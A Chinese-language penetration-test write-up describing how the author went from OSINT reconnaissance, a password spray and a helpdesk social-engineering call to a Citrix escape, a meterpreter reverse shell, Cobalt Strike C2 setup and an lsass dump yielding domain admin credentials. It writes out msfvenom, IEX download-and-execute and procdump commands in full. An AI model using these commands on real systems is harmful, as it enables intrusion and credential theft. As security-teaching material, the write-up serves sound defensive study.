特工小分队再出发

经酒仙桥六号部队任务发放，接到新的任务需要执行。

随着互联网的快速发展，特别是移动互联网的崛起，网络安全形势更为严峻。网络安全不仅涉及公民信息安全，更涉及国家安全。树立正确的网络安全观，全面加强网络安全建设，是整个互联网行业乃至社会发展到一定阶段的必然要求。

经授权对某区域内的咖啡厅、饭店、KTV等场所排查发现，有一家饭店疑似存在嫌疑人员，该饭店老板是外籍华人，在此地驻扎开店已有2-3年的时间，疑似证据主要来自该饭店的WIFI无线网络向外通讯并发送相关照片等资料。通过嗅探、抓包等技术手段，以及饭店内外无一人的情况，还是依然有数据通讯的场景下，经过信息收集后进行渗透测试排查。

目标信息：

某境外组织，知道其域名和IP范围，进行渗透测试。

从OSINT（公开资源情报计划，是美国CIA的一种情报收集手段，从各种公开的信息资源中寻找和获取有价值的情报）可以发现的大量信息，我们也可以使用工具来帮助我们找到子域名、登陆点（Citrix，OWA（outlook的网页端），VPN，SharePoint等）、建站CMS、电子邮件地址等。

（例如谷歌，Shodan, Censys (censys.io),connect.data.com,Fierce,Recon-ng,SimplyEmail, TheHarvester, SpiderFoot (spiderfoot.net), hunter.io, VirusTotal (virustotal.com), FOCA, Maltego and Pastebin (pastebin.com)等）

进行大量的信息收集后，收集到的有用信息是：outlook的登录页面（扫描其C段找到），Citrix应用程序以及1000多用户名。

搜集到的用户名：

Citrix登录页面：

outlook登陆页面（OWA）

知道了其owa我们用MailSniper工具进行Password Spray 攻击。

（MailSniper下载地址：https://github.com/dafthack/mailsniper

MailSniper简介：

MailSniper有两个主要函数。这两个函数是Invoke-GlobalMailSearch和Invoke-SelfSearch

首先用powershell打开；

搜索域中的所有邮箱命令：

Invoke-GlobalMailSearch -ImpersonationAccount current-username -ExchHostname Exch01 -OutputCsv global-email-search.csv

搜索当前用户的邮箱命令：

Invoke-SelfSearch -Mailbox current-user@domain.com

附其他规则：

爆破失败。通过查找其子域名发现某子网站有找回用户名的功能，并且通过查看其发布的文章准备通过找回账户的方式进行账号找回。

成功知道用户名后，尝试爆破密码，失败，攻击进入瓶颈。在浏览页面的时候突然看到竟然可以拨打电话进行询问密码，于是通过之前的信息收集，准备询问。

怀着忐忑的心情拨打了电话，本以为会遇到各种问题，没想到当说出用户名时就告诉了你密码！！

虽然只是普通用户，但是发现了其密码规则，于是进行重新组合密码进行爆破。

运气不错，成功登录。

成功登录。

通过查找发现“文件”菜单中的“另存为”选项，导航到C： Windows System32 目录，并调出Windows CMD实用程序（cmd.exe）。

打开CMD，使我可以访问后端Citrix服务器。

powershell加载shellcode介绍

UNIX系统一直有着功能强大的壳程序（shell），Windows PowerShell的诞生就是要提供功能相当于UNIX系统的命令行壳程序（例如：sh、bash或csh），同时也内置脚本语言以及辅助脚本程序的工具，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。

powershell具有在硬盘中易绕过，内存中难查杀的特点。一般在后渗透中，攻击者可以在计算机上执行代码时，会下载powershell脚本来执行，ps1脚本文件无需写入到硬盘中，直接可以在内存中执行。

常见的powershell攻击工具有powersploit、nishang、empire、powercat，都提供了非常牛掰的攻击脚本，也正因为powershell的强大，现在被杀软盯的都非常紧了。

我这里使用的是Invoke-Shellcode加载，Invoke-Shellcode是PowerSploit里的一个脚本工具，通过它可以加载自定义的shellcode，而且还支持在powershell中反弹msf，支持http和https协议。

先用msfvenom生成脚本木马：

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=监听IP LPORT=3333 -f powershell -o shell.ps1

在msf中监听：

windows/x64/meterpreter/reverse_https

在powershell中分别执行下面命令。

IEX(New-Object Net.WebClient).DownloadString("https://github.com/PowerShellMafia/PowerSploit/tree/master/CodeExecution/Invoke-Shellcode.ps1")      IEX(New-Object Net.WebClient).DownloadString("下载地址/shell.ps1")      Invoke-Shellcode -Shellcode ($buf) -Force

Msf上线：

顺便说一下cs流量加密，本地复现成功。

首先使用kali自带的keytool工具创建证书文件，命令：

keytool -genkey -alias tryblog -keyalg RSA -validity 18899 -keystore tryblog.store

然后修改c2.profile配置文件。

验证证书./teamserver IP 密码 ./c2.profile。

成功上线。

接下来我借助内置工具setspn.exe快速定位当前域内所有存活的各类服务器。

命令：

setspn.exe -T DomainName -Q /

接下来准备获取域用户的账号和密码（最好是域管理员），我这里采用的是lsass进程内存获取hash（当然还有很多其他的方法比如使用mimikatz、lazagne、incognito等工具或者是通过注册表获取、通过task list查看是否有与用户开启的进程如果有则凭证窃取等）。

首先下载procdump（下载地址：https://technet.microsoft.com/en-us/sysinternals/dd996900），然后执行命令（当前是管理员权限）：

Procdump64.exe -accepteula -ma lsass.exe lsass.dmp

然后使用mimikatz或者hashcat进行解密。

成功得到域管理员的密码并且成功登录域控。

针对此次渗透过程的简单梳理：

我们在信息化建设中还需要在任何关键节点上部署流量检测审计waf，对流量做到感知，知晓，明确，跟踪等一系列全方位的把控。从防守者角度来说我们需要做到攻击者进不来，进来了找不到，找到了拿不到，拿到了带不走，带走了看不懂原则。在硬件和软件层面层层设防，最终在任何一个环节都可以形成安全闭环。